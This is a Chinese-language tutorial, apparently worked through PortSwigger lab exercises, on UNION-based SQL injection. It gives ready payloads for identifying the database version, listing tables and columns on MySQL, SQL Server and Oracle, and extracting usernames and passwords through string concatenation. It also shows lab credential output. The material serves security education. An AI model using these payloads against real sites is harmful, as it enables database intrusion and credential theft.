备案控制台
探索云世界
开发者社区 数据库 文章 正文

sql注入详解-02

2022-12-13 103
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 前言在利用SQL注入漏洞时,通常需要收集数据库本身的一些信息。这包括数据库软件的类型和版本,以及数据库所包含的表和列的内容。

前言


在利用SQL注入漏洞时,通常需要收集数据库本身的一些信息。这包括数据库软件的类型和版本,以及数据库所包含的表和列的内容。


查询数据库类型和版本


不同的数据库提供了不同的查询其版本的方式。 您通常需要尝试不同的查询来查找有效的查询,从而可以确定数据库软件的类型和版本。

确定某些流行数据库类型的数据库版本的查询如下:

1.png

例如,您可以通过以下输入使用UNION攻击:

' UNION SELECT @@version--

这可能返回如下所示的输出,确认数据库是Microsoft SQL Server以及所使用的版本:

示例1

2.png

3.png

其实上图只要将from后面稍微改一改即可:

4.png5.png6.png

示例2

使用Burp Suite拦截和修改设置产品类别过滤器的请求。

确定查询返回的列数以及哪些列包含文本数据(具体操作详见上一篇)

验证查询返回两个列,它们都包含文本,在category参数中使用如下有效负载:'+UNION+SELECT+'abc','def'#使用以下有效负载来显示数据库版本:'+UNION+SELECT+@@version,+NULL#

7.png8.png9.png

列出数据库的内容

大多数数据库类型(Oracle除外)都有一组称为信息模式的视图,它们提供关于数据库的信息。

您可以查询information_schema.tables以列出数据库中的表:

SELECT * FROM information_schema.tables

这将返回如下输出:

TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE
=====================================================
MyDatabase dbo Products BASE TABLE
MyDatabase dbo Users BASE TABLE
MyDatabase dbo Feedback BASE TABLE

此输出表明存在三个表,分别称为“产品”,“用户”和“反馈”。

然后,您可以查询information_schema.columns以列出各个表中的列:

SELECT * FROM information_schema.columns WHERE table_name = 'Users'

这将返回如下输出:

TABLE_CATALOG TABLE_SCHEMA TABLE_NAME COLUMN_NAME DATA_TYPE
=================================================================
MyDatabase dbo Users UserId int
MyDatabase dbo Users Username varchar
MyDatabase dbo Users Password varchar

示例:输出显示指定表中的列以及每列的数据类型

10.png11.png12.png13.png14.png15.png里面主要是划红线的地方;

再看下面一个payload:

'+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users_ihdmlc'--

16.png

'+UNION+SELECT+username_uwlfut,+password_efkeac+FROM+users_ihdmlc--

17.png18.png19.png

Oracle上的信息架构

在Oracle上,您可以通过稍有不同的查询获得相同的信息。

您可以通过查询all_tables列出表:

SELECT * FROM all_tables

您可以通过查询all_tab_columns列出列:

SELECT * FROM all_tab_columns WHERE table_name = 'USERS'

示例

'+UNION+SELECT+'abc','def'+FROM+DUAL--

20.png

'+UNION+SELECT+table_name,NULL+FROM+all_tables--

21.png22.png

'+UNION+SELECT+column_name,NULL+FROM+all_tab_columns+WHERE+table_name='USERS_PQHJGZ'--

23.png

PASSWORD_AHCZXT
USERNAME_FWAHRU

24.png

'+UNION+SELECT+USERNAME_FWAHRU,PASSWORD_AHCZXT+FROM+USERS_PQHJGZ--

25.png26.png27.png

在单个列中检索多个值

在前面的示例中,假设查询仅返回单个列。

通过将值串联在一起,可以轻松地在单个列中同时检索多个值,理想情况下,还可以使用合适的分隔符来区分组合的值。 例如,在Oracle上,您可以提交输入:

' UNION SELECT username || '~' || password FROM users--

它使用双管道序列||,这是Oracle上的字符串连接操作符。注入的查询将用户名和密码字段的值连接在一起,以~字符分隔。例如,查询的结果将允许您读取所有的用户名和密码:

...
administrator~s3cure
wiener~peter
carlos~montoya
...

注意,不同的数据库使用不同的语法来执行字符串连接。有关更多细节,请参见SQL注入备忘单: https://portswigger.net/web-security/sql-injection/cheat-sheet

'+UNION+SELECT+NULL,'abc'--

示例

28.png29.png

'+UNION+SELECT+NULL,username||'~'||password+from+users--

30.png31.png

administrator~dqjdhb7q21vlpoqar7ze

32.png33.png

文章标签:
SQL
关系型数据库
数据安全/隐私保护
Oracle
安全
数据库
关键词:
SQL注入
richard1230
目录
相关文章
囚徒冇困境
|
1月前
|
SQL 监控 安全
SQL注入的实现原理以及防止
SQL注入的实现原理以及防止
囚徒冇困境
30 0
sumith
|
2月前
|
SQL 数据库
20、绕过去除and、or、union select、空格的sql注入
20、绕过去除and、or、union select、空格的sql注入
sumith
32 0
sumith
|
2月前
|
SQL 数据库
小课堂 -- 绕过去除特殊字符的sql注入
小课堂 -- 绕过去除特殊字符的sql注入
sumith
22 0
进步`于辰
|
2月前
|
SQL Java 数据库连接
[SQL]SQL注入与SQL执行过程(基于JDBC)
[SQL]SQL注入与SQL执行过程(基于JDBC)
进步`于辰
50 0
秋说
|
2月前
|
SQL 关系型数据库 MySQL
【MySQL进阶之路丨第十四篇】一文带你精通MySQL重复数据及SQL注入
【MySQL进阶之路丨第十四篇】一文带你精通MySQL重复数据及SQL注入
秋说
48 0
阿萨聊测试
|
2月前
|
SQL 测试技术 数据库
SQL注入,跨站脚本,跨站请求伪造,傻傻分不清楚
SQL注入,跨站脚本,跨站请求伪造,傻傻分不清楚
阿萨聊测试
28 1
hhzz
|
1月前
|
SQL Java 应用服务中间件
Java项目防止SQL注入的四种方案
Java项目防止SQL注入的四种方案
hhzz
40 0
@北鲲
|
2月前
|
SQL 安全 关系型数据库
接上篇文章,在测试宝塔 WAF 的未授权访问漏洞时无意间还发现了一个 SQL 注入漏洞
接上篇文章,在测试宝塔 WAF 的未授权访问漏洞时无意间还发现了一个 SQL 注入漏洞,品相还不错,可执行任意 SQL 语句。 总之,吃了一惊,一个防 SQL 注入的工具居然也有 SQL 注入漏洞。 请看这段代码
@北鲲
416 1
恬0917
|
3月前
|
SQL Oracle 关系型数据库
整合Mybatis-Plus高级,Oracle 主键Sequence,Sql 注入器实现自定义全局操作
整合Mybatis-Plus高级,Oracle 主键Sequence,Sql 注入器实现自定义全局操作
恬0917
89 0
东方睿赢
|
7天前
|
SQL 安全 Go
如何在 Python 中进行 Web 应用程序的安全性管理,例如防止 SQL 注入?
在Python Web开发中,确保应用安全至关重要,主要防范SQL注入、XSS和CSRF攻击。措施包括:使用参数化查询或ORM防止SQL注入;过滤与转义用户输入抵御XSS;添加CSRF令牌抵挡CSRF;启用HTTPS保障数据传输安全;实现强身份验证和授权系统;智能处理错误信息;定期更新及审计以修复漏洞;严格输入验证;并培训开发者提升安全意识。持续关注和改进是保证安全的关键。
东方睿赢
16 0

热门文章

最新文章

  • 1
    一文搞懂SQL优化——如何高效添加数据
  • 2
    【SQL server】玩转SQL server数据库:第三章 关系数据库标准语言SQL(二)数据查询
  • 3
    【SQL server】玩转SQL server数据库:第二章 关系数据库
  • 4
    SQL常见面试题总结2
  • 5
    NL2SQL实践系列(2):2024最新模型实战效果(Chat2DB-GLM、书生·浦语2、InternLM2-SQL等)以及工业级案例教学
  • 6
    NL2SQL进阶系列(5):论文解读业界前沿方案(DIN-SQL、C3-SQL、DAIL-SQL)、新一代数据集BIRD-SQL解读
  • 7
    数据库管理与电脑监控软件:SQL代码优化与实践
  • 8
    【MySQL技术之旅】(7)总结和盘点优化方案系列之常用SQL的优化
  • 9
    大模型与数据分析:探索Text-to-SQL(上)
  • 10
    SQL,Group By 真扎心,原来是这样
  • 1
    :“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server versi
    8
  • 2
    mybatis 调用修改SQL时 出现了一个问题 没有修改成功也没有报错
    12
  • 3
    sql语句创建数据库
    20
  • 4
    sql 数据库优化
    38
  • 5
    sql导入数据库命令
    12
  • 6
    一文解析 ODPS SQL 任务优化方法原理
    33
  • 7
    Oracle的PL/SQL游标属性:数据的“导航仪”与“仪表盘”
    27
  • 8
    sql 性能优化基于explain调优(二)
    12
  • 9
    Oracle的PL/SQL循环语句:数据的“旋转木马”与“无限之旅”
    10
  • 10
    Oracle的PL/SQL条件控制:数据的“红绿灯”与“分岔路”
    12

    • 相关课程

    更多
  • 如何在 PolarDB-X 中优化慢 SQL
  • SQL完全自学手册
  • SQL Server on Linux入门教程
  • SQL入门与实践
  • 数据库及SQL/MySQL基础
  • SQL进阶及查询

    • 相关电子书

    更多
  • SQL Server 2017
  • GeoMesa on Spark SQL
  • 原生SQL on Hadoop引擎- Apache HAWQ 2.x最新技术解密malili

    • 相关实验场景

    更多
  • PolarDB for AI:在数据库中通过SQL实现AI能力
  • 玩转MaxCompute SQL! 30分钟搞定数据分析挖掘
  • 使用SQL语句实现数据表管理
  • 使用SQL语句实现数据插入、修改和删除操作
  • 使用SQL语句实现数据查询操作
  • 使用SQL语句管理索引
    • 下一篇
    部署LAMP环境(Alibaba Cloud Linux 3)